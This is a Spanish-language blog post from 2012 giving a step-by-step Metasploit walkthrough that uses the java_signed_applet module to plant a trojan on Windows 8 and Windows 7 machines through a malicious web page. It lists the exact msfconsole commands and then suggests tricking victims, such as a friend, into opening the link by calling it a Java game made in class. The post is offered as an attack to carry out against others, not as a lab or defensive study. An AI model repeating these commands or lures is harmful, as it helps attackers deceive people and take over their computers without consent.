lunes, 3 de diciembre de 2012

Explotando Windows 8 Gracias a Java y Metasploit

Hace ya un tiempo que Java es el disfrute de aquellos que desean introducirse en nuestras maquinas. El agujero de seguridad es tan grade que hizo que Microsoft se replanteara su uso a la salida de Windows 8. Aunque la nueva versión del S.O (para tabletas la verdad que es una maravilla) aportó una multitud de funciones para la seguridad de nuestros equipos esa decisión le paso factura y ahora veremos como de fácil le seria a alguien explotar esa vulnerabilidad.


El proceso es fácil, rápido y solo necesitamos los siguientes Ingredientes: 
    • Distribución Linux:  Backtrack 5 - R3 ( R1 y R2 también sirven pero ya que estáis bajaros la ultima versión desde la pagina oficial que es gratis. ) http://www.backtrack-linux.org/
    • Tener instalado el Metasploit Frameworks (Si os habeis bajado la ultima versión viene de serie con el S.O)
    • Un Windows 8 
    • Internet Explorer, Mozilla FireFox, Google Chrome (si, todos se lo comen)

Básicamente vamos a utilizar [java_signed_applet]. Nos crearemos un archivo .Jar vía Metasploit y se lo colaremos a la victima mediante una pagina web la cual abrirá, automáticamente, un cuadro de dialogo para que la victima acepte y le colemos el malware. (Resumen básico y rápido)

Código:
    • msfconsole <-- con este comando abrimos a Metasploit 
    • use java_signed_applet <-- selecionamos el exploit que os he explicado antes
    • set  lhost 192.168.1.31 <-- definimos la IP del atacante por la cual nos pondremos a la escucha en el momento que entre en la web.
    • set lport 80 <--  (definimos el puerto del atacante, también sera importante para escuchar mas adelante) 
    • set URIPATH / <-- hay un espacio enre Uripath y la [/] este comando sirve para crear un Identidicador de Recursos Uniforme de forma aleatoria. URI es una cadena caracteres la cual se utiliza para identificar un nombre o un recurso. 
    • exploit <-- ejecutamos el exploit 
Con esto ya tendremos montada la pagina web con una dirección http://192.168.xxx.xxx.xxx esto lo ponemos en algún mail o se lo pasamos a algún colega diciéndole que mire que juego java mas chulo he hecho en clase de programación o lo ocultamos de alguna manera. (yo solo os pongo el método de ataque el arte ninja corre de vuestra parte o os presentáis en mis conferencias xD)


Una vez que una victima haya picado el anzuelo le aparecerá la siguiente venta. Cabe remarcar que yo he utilizado este exploit tanto en windows 7 como en windows 8 y el resultado es el mismo. 

Internet Explorer en Windows 8

Como es el juego de un colega o la trola que os hayáis inventado será bueno, por lo que lo aceptara y nosotros veremos como el Malware empieza a funcionar mostrando que se envía el archivo SITE LOADER.JAR (como podeis ver hay 2 IPs diferentes corresponden al Windows 8 y a Windows 7 anterior mente mencionados como veis a los 2 ha sido enviado)

Perfecto ahora solo queda que el "colega" haga aceptar otra vez en el panel de SiteLoader y para dentro. Que cuele ya depende de vuestra Ingeniería social. Pero lo que os quiero hacer ver es que muchas veces salen carteles de estos y pocos somos los que le damos a cancelar, o nos los miramos mínimamente.

Como veis la barra de arriba ha cambiado un poco eso es que estoy utilizando Windows 7

Después ya tendrá un bonito troyano dentro al cual le podremos decir que haga las mil maravillas.

_________________________________________________________
Las Gracias A Quienes Se Las Merecen:
---------------------------------------------------------------------------------------------

No hay comentarios:

Publicar un comentario en la entrada